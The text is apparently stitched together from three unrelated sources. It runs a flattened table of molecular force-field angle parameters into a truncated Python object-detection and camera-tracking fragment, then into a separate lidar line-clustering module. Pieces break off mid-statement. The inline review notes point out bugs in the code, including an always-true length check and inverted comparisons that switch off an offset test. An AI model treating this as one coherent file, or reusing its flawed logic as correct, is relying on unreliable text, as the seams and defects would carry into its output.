117.38 5/2017 90 1.1235 c -cy-os 82.4 115.16 5/2017 6 1.5549 cv-cy-cy 73.5 86.72 5/2017 24 1.1522 cv-cy-hc 46.3 114.40 5/2017 18 1.4851 cx-cy-cy 66.1 106.75 5/2017 3 4.9550 cx-cy-hc 45.7 118.30 SOURCE2 3 5.7799 cy-cy-cy 71.9 88.44 5/2017 714 1.4899 cy-cy-f 84.6 115.66 5/2017 27 3.1666 cy-cy-h1 45.6 113.17 5/2017 481 1.1549 cy-cy-h2 44.9 116.79 5/2017 123 0.8369 cy-cy-hc 45.2 114.76 5/2017 1518 2.4131 cy-cy-n3 80.9 116.60 5/2017 41 1.9946 cy-cy-n 80.3 119.87 5/2017 113 1.4402 cy-cy-na 80.1 119.48 5/2017 17 0.5542 cy-cy-oh 82.6 114.60 5/2017 24 2.6382 cy-cy-os 82.3 114.71 5/2017 39 2.3152 cy-cy-s6 60.8 117.08 5/2017 12 1.3239 cy-cy-ss 60.6 118.27 5/2017 90 1.2954 h1-cy-h1 38.7 109.44 5/2017 67 0.5923 h1-cy-n3 61.4 110.16 5/2017 15 1.4228 h1-cy-n 62.9 107.99 5/2017 80 0.6278 h1-cy-oh 63.3 109.11 5/2017 4 2.0154 h1-cy-os 62.9 109.23 5/2017 10 1.1356 h1-cy-s6 41.7 111.19 5/2017 11 1.1767 h2-cy-n 59.8 114.50 SOURCE4_SOURCE5 213 0.6904 h2-cy-os 63.0 108.84 5/2017 12 0.4716 h2-cy-s6 41.8 110.84 5/2017 23 1.9357 h2-cy-ss 42.0 109.66 5/2017 87 0.4949 hc-cy-hc 38.8 108.97 5/2017 285 0.5322 n -cy-os 109.9 110.91 5/2017 3 2.6953 n -cy-s6 82.4 103.18 SOURCE4_SOURCE5 18 0.8204 n -cy-ss 81.7 105.13 SOURCE4_SOURCE5 165 0.4214 nh-cz-nh 112.6 120.14 SOURCE4_SOURCE5 67 0.3910 br-n1-c1 52.1 180.00 HF/6-31G* 1 c1-n1-c1 65.9 179.92 HF/6-31G* 1 c1-n1-c2 61.7 177.73 HF/6-31G* 1 c1-n1-c3 57.8 177.72 HF/6-31G*_SOURCE5 6 0.4473 c1-n1-ca 60.5 179.99 HF/6-31G* 1 c1-n1-cl 62.2 179.95 HF/6-31G* 1 c1-n1-f 73.9 179.96 HF/6-31G* 1 c1-n1-hn 45.5 179.98 HF/6-31G* 1 c1-n1-i 49.1 179.95 HF/6-31G* 1 c1-n1-n1 83.2 180.00 HF/6-31G* 1 c1-n1-n2 81.6 171.56 HF/6-31G* 1 c1-n1-n3 76.1 175.59 HF/6-31G* 1 c1-n1-n4 74.8 179.69 HF/6-31G* 1 c1-n1-na 75.1 180.00 HF/6-31G* 1 c1-n1-nh 76.3 176.35 HF/6-31G* 1 c1-n1-o 77.9 179.95 HF/6-31G* 1 c1-n1-oh 78.3 174.31 HF/6-31G* 1 c1-n1-os 77.4 176.61 HF/6-31G* 1 c1-n1-p2 71.0 172.83 HF/6-31G* 1 c1-n1-p3 71.6 173.51 HF/6-31G* 1 c1-n1-p4 70.7 173.64 HF/6-31G* 1 c1-n1-p5 74.4 
177.28 HF/6-31G* 1 c1-n1-s2 61.9 178.11 HF/6-31G* 1 c1-n1-s4 56.7 169.60 HF/6-31G* 1 c1-n1-s 54.8 179.99 HF/6-31G* 1 c1-n1-s6 63.4 175.92 HF/6-31G* 1 c1-n1-sh 57.2 174.25 HF/6-31G* 1 c1-n1-ss 56.9 176.06 HF/6-31G* 1 c2-n1-n1 77.2 180.00 HF/6-31G* 1 c2-n1-o 91.4 116.94 SOURCE3 2 0.0060 c2-n1-s 66.6 118.00 SOURCE3 2 0.0121 c3-n1-n1 72.2 180.00 HF/6-31G* 1 ca-n1-n1 76.1 180.00 HF/6-31G* 1 ce-n1-o 89.2 122.40 CORR 2 ce-n1-s 66.7 117.34 CORR 2 cf-n1-o 89.2 122.40 CORR 2 cf-n1-s 66.7 117.34 CORR 2 cl-n1-n1 78.0 179.94 HF/6-31G* 1 f -n1-n1 92.9 179.93 HF/6-31G* 1 hn-n1-n1 57.7 179.91 HF/6-31G* 1 i -n1-n1 61.3 179.94 HF/6-31G* 1 n1-n1-n1 105.1 179.97 HF/6-31G* 1 n1-n1-n2 102.5 172.85 HF/6-31G*_SOURCE5 38 0.7957 n1-n1-n3 95.8 175.09 HF/6-31G* 1 n1-n1-n4 94.1 179.91 HF/6-31G* 1 n1-n1-na 94.5 179.97 HF/6-31G* 1 n1-n1-nh 96.1 176.00 HF/6-31G* 1 n1-n1-o 98.2 179.94 HF/6-31G* 1 n1-n1-oh 98.8 173.77 HF/6-31G* 1 n1-n1-os 97.6 176.12 HF/6-31G* 1 n1-n1-p2 88.5 174.71 HF/6-31G* 1 n1-n1-p3 89.5 174.27 HF/6-31G* 1 n1-n1-s 68.7 180.00 SOURCE3 1 n1-n1-sh 71.6 175.07 HF/6-31G* 1 n1-n1-ss 71.5 175.61 HF/6-31G* 1 o -n1-p2 107.3 116.05 SOURCE3 1 p2-n1-s 83.7 119.93 SOURCE3 1 br-n2-br 64.5 106.60 SOURCE3 1 br-n2-c2 60.2 112.40 SOURCE3 1 br-n2-n2 76.1 110.42 SOURCE3 1 br-n2-o 74.5 114.47 SOURCE3 1 br-n2-p2 82.7 111.03 SOURCE3 1 br-n2-s 63.5 115.78 SOURCE3 1 c1-n2-c1 77.4 121.10 SOURCE3 1 c1-n2-c3 60.9 151.88 SOURCE3 4 15.8282 c1-n2-cl 68.8 118.80 SOURCE2 1 c1-n2-hn 52.3 126.50 SOURCE2 3 7.6267 c1-n2-n2 97.2 113.40 SOURCE3 1 c1-n2-o 99.3 113.59 SOURCE3 1 c1-n2-p2 88.5 119.57 SOURCE3 1 c1-n2-s 71.9 117.67 SOURCE3 1 c2-n2-c2 73.2 118.18 SOURCE3 1 c2-n2-c3 68.5 115.30 SOURCE3 8 4.2940 c2-n2-ca 72.1 119.94 SOURCE3 1 c2-n2-cl 70.5 112.64 SOURCE3 1 c2-n2-f 90.8 108.14 SOURCE3 1 c2-n2-hn 53.2 110.80 SOURCE3_SOURCE5 419 0.5563 c2-n2-i 54.9 114.74 SOURCE3 2 0.0139 c2-n2-n1 94.7 115.09 HF/6-31G* 1 c2-n2-n2 98.5 103.59 SOURCE3 2 c2-n2-n3 90.0 118.14 SOURCE3 1 c2-n2-n4 78.6 112.22 SOURCE3 3 0.0406 c2-n2-n 
88.9 117.93 SOURCE4_SOURCE5 32 1.2067 c2-n2-na 88.7 117.58 SOURCE3 8 1.6671 c2-n2-nh 89.3 117.61 SOURCE3 6 3.2642 c2-n2-no 86.0 118.02 SOURCE3_SOURCE5 8 0.7772 c2-n2-o 94.4 116.94 SOURCE3 1 c2-n2-oh 90.4 111.12 SOURCE4_SOURCE5 59 1.2303 c2-n2-os 90.0 110.96 SOURCE4_SOURCE5 46 1.0478 c2-n2-p2 88.8 116.00 SOURCE3 1 c2-n2-p3 80.9 119.30 SOURCE3 3 2.8489 c2-n2-p4 82.7 118.77 SOURCE3 1 c2-n2-s4 70.1 112.29 SOURCE3 1 c2-n2-s6 70.8 116.24 SOURCE3 1 c2-n2-s 70.7 118.00 SOURCE3 1 c2-n2-sh 64.9 115.48 SOURCE3 1 c2-n2-ss 66.9 118.04 SOURCE3 4 2.2804 c3-n2-c3 66.1 110.70 SOURCE3 1 c3-n2-ca 68.2 115.05 SOURCE4_SOURCE5 12 1.0676 c3-n2-ce 67.4 118.67 CORR_SOURCE5 270 1.8559 c3-n2-cf 67.4 118.67 CORR_SOURCE5 270 1.8559 c3-n2-hn 45.9 118.40 SOURCE3 1 c3-n2-n1 86.6 116.10 SOURCE4_SOURCE5 33 0.4557 c3-n2-n2 87.8 110.84 SOURCE3_SOURCE5 20 1.2862 c3-n2-nh 86.1 109.99 SOURCE3 1 c3-n2-o 88.3 112.40 SOURCE2 1 c3-n2-p2 85.9 114.21 SOURCE3 2 2.2772 c3-n2-s6 68.3 113.84 SOURCE3 1 c3-n2-s 67.8 116.72 SOURCE3 1 ca-n2-ca 73.9 112.20 SOURCE3 1 ca-n2-hn 50.4 120.00 SOURCE3 1 ca-n2-n2 93.3 113.53 SOURCE3 1 ca-n2-o 93.9 116.00 SOURCE2 1 ca-n2-p2 87.6 118.11 SOURCE3 1 ca-n2-s 69.8 120.11 SOURCE3 1 c -n2-c2 68.3 120.97 SOURCE3 1 c -n2-c 64.6 123.80 SOURCE3 1 c -n2-ca 68.0 120.50 SOURCE3 1 cc-n2-cl 69.5 115.79 CORR 2 cc-n2-hn 52.8 111.25 CORR_SOURCE5 44 0.9238 cc-n2-na 91.8 109.24 SOURCE4_SOURCE5 23 1.5921 cc-n2-nh 88.7 118.47 SOURCE4_SOURCE5 13 1.7276 cd-n2-cl 69.5 115.79 CORR 2 cd-n2-hn 52.8 111.25 CORR_SOURCE5 44 0.9238 ce-n2-hn 53.0 111.00 CORR_SOURCE5 129 0.3980 ce-n2-n 88.7 117.98 CORR_SOURCE5 153 0.9604 ce-n2-nh 88.8 118.34 CORR_SOURCE5 99 1.0308 ce-n2-o 96.2 112.16 SOURCE3 1 ce-n2-oh 89.5 112.79 CORR_SOURCE5 124 1.4261 ce-n2-os 89.1 112.79 CORR_SOURCE5 58 1.1282 ce-n2-s 71.2 116.28 SOURCE3 1 cf-n2-hn 52.9 111.05 CORR_SOURCE5 5 0.7460 cf-n2-n 88.7 117.98 CORR_SOURCE5 153 0.9604 cf-n2-nh 88.8 118.34 CORR_SOURCE5 99 1.0308 cf-n2-o 96.2 112.16 SOURCE3 1 cf-n2-oh 89.5 112.79 CORR_SOURCE5 124 1.4261 
cf-n2-os 89.1 112.79 CORR_SOURCE5 58 1.1282 cf-n2-s 71.2 116.28 SOURCE3 1 cl-n2-n1 90.0 108.70 SOURCE2 1 cl-n2-n2 89.2 110.47 SOURCE3 1 cl-n2-o 87.9 114.03 SOURCE3 1 cl-n2-p2 93.1 112.98 SOURCE3 1 cl-n2-s 72.6 115.77 SOURCE3 1 cx-n2-n2 115.2 65.27 5/2017 3 0.2783 f -n2-n2 110.9 114.60 SOURCE2 1 f -n2-o 114.5 110.10 SOURCE2 1 f -n2-p2 113.3 107.10 SOURCE3 1 f -n2-s 89.0 110.73 SOURCE3 1 hn-n2-hn 38.3 120.00 SOURCE3 1 hn-n2-n1 67.7 114.10 SOURCE2 1 hn-n2-n2 69.0 105.01 SOURCE3 19 1.5183 hn-n2-ne 67.7 108.56 SOURCE3 29 5.5708 hn-n2-nf 67.7 108.56 SOURCE3 29 hn-n2-o 70.3 107.37 SOURCE3 1 hn-n2-p2 59.8 112.09 SOURCE3 18 4.0663 hn-n2-p4 55.6 111.33 SOURCE3 1 hn-n2-p5 57.5 122.34 SOURCE3 1 hn-n2-pe 62.6 111.41 SOURCE3 20 4.9895 hn-n2-pf 62.6 111.41 SOURCE3 20 hn-n2-s2 47.7 115.80 SOURCE2 1 hn-n2-s4 46.6 111.21 SOURCE3 1 hn-n2-s 49.4 108.17 SOURCE3 1 hn-n2-s6 48.4 111.17 SOURCE3_SOURCE5 7 0.7012 i -n2-n2 69.5 111.79 SOURCE3 1 i -n2-o 67.5 116.82 SOURCE3 1 i -n2-p2 77.6 113.26 SOURCE3 1 i -n2-s 59.6 116.85 SOURCE3 1 n1-n2-n1 122.8 112.00 HF/6-31G* 1 n2-n2-n1 95.4 180.00 dac_for_azides 0 n2-n2-n2 120.7 109.49 SOURCE3 2 n2-n2-n3 118.0 108.88 SOURCE3 1 n2-n2-n4 101.2 106.45 SOURCE3 1 n2-n2-na 114.3 112.23 SOURCE3 1 n2-n2-nh 115.3 111.70 SOURCE3 5 0.3475 n2-n2-no 114.1 105.97 SOURCE3 1 n2-n2-o 122.4 110.43 SOURCE3 1 n2-n2-oh 113.5 111.51 SOURCE3 1 n2-n2-os 114.6 108.38 SOURCE3 1 n2-n2-p2 114.9 109.15 SOURCE3 1 n2-n2-p3 104.2 113.05 SOURCE3 1 n2-n2-p4 103.8 118.77 SOURCE3 1 n2-n2-p5 114.5 110.46 SOURCE3 1 n2-n2-s4 90.1 107.30 SOURCE3 1 n2-n2-s6 90.9 111.25 SOURCE3 1 n2-n2-s 89.6 115.91 SOURCE3 1 n2-n2-sh 83.0 111.10 SOURCE3 1 n2-n2-ss 86.1 112.14 SOURCE3 1 n3-n2-n3 112.2 115.07 SOURCE3 1 n3-n2-o 117.2 114.00 SOURCE2 1 n3-n2-p2 110.5 115.34 SOURCE3 1 n3-n2-s 87.9 117.13 SOURCE3 1 n4-n2-n4 92.2 106.70 SOURCE3 1 n4-n2-o 99.1 112.20 SOURCE3 1 n4-n2-p2 101.4 113.07 SOURCE3 1 n4-n2-s 78.5 118.50 SOURCE3 1 na-n2-na 113.1 107.00 SOURCE3
# (truncated at chunk boundary — the enclosing colour-classification function begins above this excerpt) … box
    # Map the winning channel sum back to a colour name.
    if print_color == blue_sum:  # determing the colour, the highest value is equal to and returning that value in a string
        object_color = "Blue"
    elif print_color == green_sum:
        object_color = "Green"
    elif print_color == red_sum:
        object_color = "Red"
    elif print_color == yellow_sum:
        object_color = "Yellow"
    elif print_color == white_sum:
        object_color = "White"
    elif print_color == black_sum:
        object_color = "Black"
    return object_color  # returning the highest mask value as the colour


def get_detected_objects(detected_objects, label, x, y, z, camera_pose, py_translation, cropped_image,
                         existing_labels, positional_buffer_array, rotational_buffer_array):
    '''
    Detected Objects are stored in an array, with verification for uniqueness of the detection being performed
    by location data (it being atleast half a meter in any direction -x, y, z) and image similarity which are
    stored in the directory 'memory_images' with the unique id of the object being stored as the title of the
    image. The images are compared using the functions 'get_ssim' & 'similarity'.
    '''
    # NOTE(review): indentation of this function was reconstructed from a collapsed paste —
    # nesting of the label-exists branch below should be confirmed against the original file.
    tx, ty, tz, rx, ry, rz, stable = positional_buffer_CAMERAframe(camera_pose, py_translation,
                                                                   positional_buffer_array,
                                                                   rotational_buffer_array)  # transaltional, rotational data received from the buffer function
    # tx, ty, tz, rx, ry, rz = get_positional_data(camera_pose,py_translation)
    tx = round(tx, 3)
    ty = round(ty, 3)
    tz = round(tz, 3)
    x = round(x, 3)
    y = round(y, 3)
    z = round(z, 3)
    # NOTE(review): duplicate_detections is never used below — dead local.
    duplicate_detections = []  # an array to store the detection data when the class of object already exists in the list of detected objects
    exist_values_array = []  # an array that stores the values of duplicate objects from the class to compare it's existence from previous detected data
    '''From the buffer function, the translational and rotational values are stored in between 2 positions of
    the camera. Assisted by the stability of the Camera frame of reference, the values in between 2 zero values
    are stored in an array and their sum is sent through in tx,ty,tz values as a one-off value which is
    succeeded and preceded with null values. The rotational values are passed in real-time with no buffer
    however, only affect the positional data when a 90 degree or 180 degree rotational drift occurs, the new
    translational data, now is altered based on a new method of adding or subtracting from previous values
    based on a new addition/subtraction method from functions as seen in positional_update(left,right,inverted)'''
    if rx != 0.0 or ry != 0.0 or rz != 0.0:  # update only when the rotation value is greater than zero
        rotation, detected_objects = rotational_update(detected_objects, rx, ry, rz)
    if tx != 0.0 or ty != 0.0 or tz != 0.0:  # update only when translational value is greater than zero
        # NOTE(review): every matching entry triggers a whole-list positional update, so with k tagged
        # entries the list is re-updated k times — confirm this is intended and not a double count.
        for detected_rot in detected_objects:  # updating values based on the rotation tag stored in each entry
            if "no rotation" in detected_rot:
                detected_objects = positional_update(detected_objects, tx, ty, tz)
            elif "rotated left" in detected_rot:
                detected_objects = positional_update_left(detected_objects, tx, ty, tz)
            elif "rotated right" in detected_rot:
                detected_objects = positional_update_right(detected_objects, tx, ty, tz)
            elif "inverted" in detected_rot:
                detected_objects = positional_update_inverted(detected_objects, tx, ty, tz)
    # NOTE(review): len(...) >= 0 is always true — "> 0" was probably intended (harmless either way,
    # iterating an empty list is a no-op).
    if len(detected_objects) >= 0:  # if length of detected objects is greater than or equal to 0
        for detected in detected_objects:  # scrolling through all the entries of the detected objects list
            if detected[1] not in existing_labels:
                existing_labels.append(detected[1])  # storing the unique labels of the detected objects in the existing_labels array (useful
                # for populating first occurences of the onject class in the detcted objects array)
    if label not in existing_labels:  # the entries into detected object is appended, with first instances of
        # the class is immediately added into the detected_objects list
        # print(existing_labels)
        # NOTE(review): "id" shadows the builtin, and randint ids can collide — consider uuid4.
        id = random.randint(1, 1000000000)
        detected_o = [id, label, round(tx + x, 3), round(ty + y, 3), round(tz + z, 3), "orig", "no rotation"]
        detected_objects.append(detected_o)
        cv2.imwrite("/home/adi/Downloads/zed-yolo/libdarknet/images/{}.jpg".format(id), cropped_image)
        # the cropped image (bounding box) of the detected object is written into a file
        # (to be used for image comparison and human verification that it is a different object)
    else:  # if the class already exists, then this method verifies if the object has been
        # detected for the first time and if it has, it is appended into detected_objects.
        for detected in detected_objects:  # scrolling through the index of detected_objects from memory
            if detected[1] == label:  # the labels match
                cv2.imwrite("present_image.jpg", cropped_image)
                subtracted_value = [round(abs(abs(x) - abs(detected[2])), 3),
                                    round(abs(abs(y) - abs(detected[3])), 3),
                                    round(abs(abs(z) - abs(detected[4])), 3), detected[0]]
                exist_values_array.append(
                    subtracted_value)  # adding subtracted location values of all occurences of detection in the object class into an array
        # NOTE(review): reconstructed placement — sorting is assumed to happen after collecting all
        # matches ("all occurences" per the comment above); confirm against the original indentation.
        exist_values_array = sorted(exist_values_array)  # sorting the array in ascending order
        new_value = exist_values_array[
            0]  # taking the least value of subtraction between new occurence and past occurence
        present_image = cv2.imread("present_image.jpg")
        if new_value[0] > 0.2 and new_value[
                2] > 0.2 and image_compare_hist(present_image, new_value[3], label) is False:
            # if the object is unique it is appended into the list by giving it a unique ID
            print("True")
            id = random.randint(1, 1000000000)
            detected_o = [id, label, round((x - tx), 3), round((y - ty), 3), round((z - tz), 3), "new",
                          "no rotation"]
            detected_objects.append(detected_o)
            cv2.imwrite("/home/adi/Downloads/zed-yolo/libdarknet/images/{}.jpg".format(id), cropped_image)
            # the cropped image (bounding box) of the detected object is written into a file
        if new_value[0] > 0.1 and new_value[
                2] > 0.1 and image_compare_hist(present_image, new_value[3], label) is True:
            # if the object is is similar to some object from the past but the location has changed,
            # the entry in the detected objects array is changed with new location information
            # print("location of ", label, "changed")
            # NOTE(review): remove()/append() while iterating detected_objects mutates the list under
            # the loop, and this "detected" shadows the outer loop variable — confirm intended;
            # iterating over a snapshot (list(detected_objects)) with a break would be safer.
            for detected in detected_objects:
                if detected[0] == new_value[3]:
                    id = detected[0]  # id is preserved and all the other sections of the entry are replaced with new location of the object
                    detected_objects.remove(detected)
                    detected_o = [id, label, round((x - tx), 3), round((y - ty), 3), round((z - tz), 3),
                                  "new location", "no rotation"]
                    detected_objects.append(detected_o)
                    cv2.imwrite("/home/adi/Downloads/zed-yolo/libdarknet/images/{}.jpg".format(id), cropped_image)
                    # the cropped image (bounding box) of the detected object is written into a file
    return detected_objects


def positional_data(camera_pose, py_translation):
    '''
    The positional tracking and rotational data generated by the IMU, gyroscope sensors in the camera are
    returned here as tx, ty, tz. The positional tracking information relies on a variety of factors such as
    depth data (Ultra and Quality modes give more reliable information but affect fps, however, Performance
    mode is faster but the positional information isn't reliable.) The positional tracking information is
    critical to updating the positional information of detected objects as it moves out of the frame. The
    rotational information can be used in pose estimation.
    '''
    # Rotation is rounded to 2 decimals, translation to 3 (meters) — presumably to suppress sensor
    # jitter before the zero-comparisons in the buffer function; confirm the chosen precisions.
    rotation = camera_pose.get_rotation_vector()  # The rotation information from the gyroscopic sensors
    rx = round(rotation[0], 2)  # The rotational information of the x-axis
    ry = round(rotation[1], 2)  # The rotational information of the y-axis
    rz = round(rotation[2], 2)  # The rotational information of the z-axis
    translation = camera_pose.get_translation(py_translation)  # The translational information from the IMU sensors
    tx = round(translation.get()[0], 3)  # The translational information of the x-axis
    ty = round(translation.get()[1], 3)  # The translational information of the y-axis
    tz = round(translation.get()[2], 3)  # The translational information of the z-axis
    return tx, ty, tz, rx, ry, rz


def positional_buffer_CAMERAframe(camera_pose, py_translation, positional_buffer_array, rotational_buffer_array):
    tx, ty, tz, rx, ry, rz = positional_data(camera_pose, py_translation)
    '''The translational and rotational data given by the camera may have some errors due to the speed of the
    movement or via other means (repeated values before the camera frame values normalise to 0,0,0). This
    function stores values between 2 consecutive zero values and releases them once after the CAMERA frame
    stablises. This allows, the values to be updated only once, rather than a repeated update.'''
    stable = True
    x_sum = y_sum = z_sum = 0.0
    rx_sum = ry_sum = rz_sum = 0.0
    if tx != 0.0 or ty != 0.0 or tz != 0.0:  # A trigger to start storing values for translation to be processed later
        pos = [tx, ty, tz]
        if pos not in positional_buffer_array:  # storing unique values in an array
            positional_buffer_array.append(pos)
    # NOTE(review): chunk truncated below — the condition (and the rest of this function) continues
    # past this excerpt.
    if rx != 0.0 or ry != 0.0
import cv2
import time
import math
import statistics
import numpy as np
import matplotlib.pyplot as plt
import itertools
import random
from Lidar_tools import find_lidar_phi_from_coord, find_lidar_theta_from_coord, find_lidar_theta_phi_from_image, \
    find_sample_from_angle, interpolation, polar_to_cartesian
from Lidar_tools_AG import coords_ro_move, build_roatation_matrix_3D


def build_matrix_from_line(target_line, option=0):
    """Build the 2-D transform that aligns a frame with *target_line*.

    target_line is (x1, y1, x2, y2).  Returns (move_matrix, rotation_matrix,
    angle): *angle* is the slope angle of the line in radians (pi/2 when the
    line is exactly vertical), *move_matrix* translates the second endpoint
    (option == 0) or the midpoint of the line (any other option) onto the
    origin, and *rotation_matrix* is the rotation by pi/2 - angle.
    """
    x1, y1, x2, y2 = target_line[0], target_line[1], target_line[2], target_line[3]
    try:
        slope_angle = math.atan((y1 - y2) / (x1 - x2))
    except ZeroDivisionError:  # exactly vertical line (plain-float inputs)
        slope_angle = np.pi / 2
    theta = np.pi / 2 - slope_angle
    if option == 0:
        # shift the second endpoint onto the origin
        move_matrix = np.array([-x2, -y2])
    else:
        # shift the midpoint of the line onto the origin
        move_matrix = np.array([-(x2 + x1) / 2, -(y2 + y1) / 2])
    rotation_matrix = np.array([[math.cos(theta), -math.sin(theta)],
                                [math.sin(theta), math.cos(theta)]])
    return move_matrix, rotation_matrix, slope_angle


def debug_c1(n, n_last, lines):
    """Sanity check for cluster inheritance: line *n_last* should NOT connect
    back in the reverse direction once the cluster was inherited.

    NOTE: for the check to be meaningful the thresholds must match the
    defaults of cluster_criterion.
    """
    start_points = np.expand_dims(lines[n_last, 0:2], axis=0)
    end_points = np.expand_dims(lines[n_last, 2:4], axis=0)
    connected = cluster_criterion(lines[n], start_points, end_points)
    if connected == 0:
        return "-- can't connect in the other dirction, correctly inherit the cluster"
    return '-- can connect in the other dirction, something wrong'


#def rotation_to_line(n, lines_col1, lines_col2): # rotate to the n line
#    try:
#        theta = math.atan((lines_col2[n, 1] - lines_col1[n, 1]) / (lines_col2[n, 0] - lines_col1[n, 0]))
#    except ZeroDivisionError:
#        theta = np.pi / 2
#    theta = np.pi / 2 - theta
#
#    move_matrix = np.array([-(lines_col1[n,0] + lines_col2[n,0])/2, -(lines_col1[n,1] + lines_col2[n,1])/2])
#    roatation_martix = np.array([[math.cos(theta), -math.sin(theta)],
#                                 [math.sin(theta), math.cos(theta)]])
#
#    lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix))
#    lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix))
#
#    return lines_col1_new, lines_col2_new


def cluster_criterion(n, lines_col1, lines_col2, threshold_angle=20, threshold_offset=1, threshold_dist=7):
    """Connectivity test of every segment against segment *n*.

    lines_col1/lines_col2 hold the start and end points (one row per segment).
    All segments are transformed into the frame of segment *n* (its midpoint at
    the origin, its direction near-vertical); a segment is connected when its
    direction is within threshold_angle degrees of segment n, its lateral (x)
    offset is below threshold_offset and its nearest endpoint's longitudinal
    (y) distance is below threshold_dist.
    """
    # output a index vector, where == 1 means that line is connected with the target line
    threshold_angle = threshold_angle / 180 * np.pi  # degrees -> radians
    sample_num = lines_col1.shape[0]
    move_matrix, roatation_martix, angle = build_matrix_from_line([lines_col1[n, 0], lines_col1[n, 1],
                                                                   lines_col2[n, 0], lines_col2[n, 1]], option=1)
    # right-multiplying row vectors by inv(R) applies the inverse rotation
    lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix))
    lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix))
    delta = lines_col2_new - lines_col1_new
    # NOTE(review): a vertical transformed segment gives delta x == 0 and a divide-by-zero
    # RuntimeWarning; np.arctan(+/-inf) = +/-pi/2 keeps the result usable.
    theta_new = np.arctan(delta[:, 1] / delta[:, 0])
    angle_diff = np.pi / 2 - abs(theta_new)  # deviation from segment n's (vertical) direction
    x_diff = np.min(abs(np.hstack([lines_col1_new[:, 0].reshape(sample_num, 1), lines_col2_new[:, 0].reshape(sample_num, 1)])), axis=1)
    y_diff = np.min(abs(np.hstack([lines_col1_new[:, 1].reshape(sample_num, 1), lines_col2_new[:, 1].reshape(sample_num, 1)])), axis=1)
    connect_index_add = (angle_diff < threshold_angle) & (x_diff < threshold_offset) & (y_diff < threshold_dist)
    return connect_index_add


def cluster_criterion2(n, lines_col1, lines_col2, threshold_r=0.01):
    """Alternative connectivity test built on the perpendicular through each
    segment's midpoint, evaluated in the frame of segment *n*.

    For each segment: k is the slope of the perpendicular, b its y-intercept,
    intercept_x = |b/k| the distance to its x-intercept (r1), and r2 the
    distance between its x- and y-intercepts; segments are connected when
    |r1 - r2| < threshold_r.  Presumably this tests for a common center on the
    x-axis of segment n's frame — TODO confirm the geometric intent.
    """
    move_matrix, roatation_martix, angle = build_matrix_from_line([lines_col1[n, 0], lines_col1[n, 1],
                                                                   lines_col2[n, 0], lines_col2[n, 1]], option=1)
    lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix))
    lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix))
    delta = lines_col2_new - lines_col1_new
    k = delta[:, 1] / delta[:, 0]
    k = -1/k  # slope of the perpendicular
    # guard: exactly axis-aligned transformed segments produce inf/0 perpendicular slopes,
    # which the intercept arithmetic below cannot handle
    assert(not (np.any(k == np.inf) | np.any(k==0)))
    line_center = (lines_col2_new + lines_col1_new) / 2
    b = line_center[:,1] - k * line_center[:,0]  # y-intercept of the perpendicular
    intercept_x = np.abs(b/k)  # it's also the r1
    r2 = np.sqrt(intercept_x**2 + b**2)
    connect_index_add = np.abs(intercept_x - r2) < threshold_r
    return connect_index_add


def cluster_criterion3(n, lines_col1, lines_col2, threshold_angle=5, threshold_offset=0.5):
    """Third connectivity variant comparing, in segment n's frame, the angles
    between each segment's perpendicular/parallel intercept vectors and those
    of segment n, combined with a lateral-offset test.
    """
    threshold_angle = 180 - 2*threshold_angle
    threshold_angle = threshold_angle / 180 * np.pi  # degrees -> radians
    sample_num = lines_col1.shape[0]
    move_matrix, roatation_martix, angle = build_matrix_from_line(
        [lines_col1[n, 0], lines_col1[n, 1], lines_col2[n, 0], lines_col2[n, 1]], option=1)
    lines_col1_new = np.dot((lines_col1 + move_matrix), np.linalg.inv(roatation_martix))
    lines_col2_new = np.dot((lines_col2 + move_matrix), np.linalg.inv(roatation_martix))
    delta = lines_col2_new - lines_col1_new
    k = delta[:, 1] / delta[:, 0]  # segment slope
    k2 = -1/k  # perpendicular slope
    line_center = (lines_col2_new + lines_col1_new) / 2
    m = line_center[:,1] - k * line_center[:,0]  # y-intercept along the segment direction
    m2 = line_center[:,1] - k2 * line_center[:,0]  # y-intercept along the perpendicular
    inter1 = np.vstack([np.zeros_like(m), m]).T  # (0, m) intercept points
    inter2 = np.vstack([np.zeros_like(m2), m2]).T
    vector1 = inter1 - line_center
    length1 = np.sqrt(vector1[:,0]**2 + vector1[:,1]**2)
    base_vector1 = vector1[n,:]  # segment n's own intercept vector as reference
    base_length1 = np.sqrt(vector1[n,0]**2 + vector1[n,1]**2)
    vector2 = inter2 - line_center
    length2 = np.sqrt(vector2[:, 0] ** 2 + vector2[:, 1] ** 2)
    base_vector2 = vector2[n, :]
    base_length2 = np.sqrt(vector2[n, 0] ** 2 + vector2[n, 1] ** 2)
    x_diff = np.min(abs(np.hstack([lines_col1_new[:, 0].reshape(sample_num, 1), lines_col2_new[:, 0].reshape(sample_num, 1)])),axis=1)
    angle1 = np.arccos(np.dot(vector1, base_vector1) / length1 / base_length1)
    angle2 = np.arccos(np.dot(vector2, base_vector2) / length2 / base_length2)
    connect_index_add1 = angle1 - angle2 > threshold_angle
    connect_index_add1[np.where(k == math.inf)] = 1  # vertical segments pass the angle test by fiat
    connect_index_add1[np.where(k == -math.inf)] = 1
    connect_index_add2 = x_diff < threshold_offset
    # NOTE(review): every finite k satisfies "k != inf" and "k != -inf", so these two lines set
    # connect_index_add2 to 1 almost everywhere, effectively disabling the x_diff test —
    # "==" was probably intended (mirroring the two lines above).
    connect_index_add2[np.where(k != math.inf)] = 1
    connect_index_add2[np.where(k != -math.inf)] = 1
    connect_index_add = connect_index_add1 & connect_index_add2
    #print(connect_index_add)
    return connect_index_add
def iter_core(n_current, n_last, lines, check_state, connect_index_initial, cluster_index, inherit_C):
    """Recursive flood-fill step over the connectivity graph defined by cluster_criterion.

    check_state per line: 0 = unvisited, 1 = visited but not yet assigned to a
    cluster, 2 = assigned.  Returns (order, C, check_state, connect_index):
    *order* tells the caller whether an existing cluster number *C* must be
    inherited for the component being built; *connect_index* accumulates the
    component's membership mask.
    NOTE(review): check_state is both mutated in place (check_state[n_current] = 1)
    and rebound to a new array ("|" below) — callers rely on the returned value,
    not only on the in-place mutation.
    """
    lines_col1 = lines[:, 0:2]
    lines_col2 = lines[:, 2:4]
    #sample_num = lines.shape[0]
    #line = lines[n_current]
    if check_state[n_current] == 0:  # this line is not checked before
        check_state[n_current] = 1
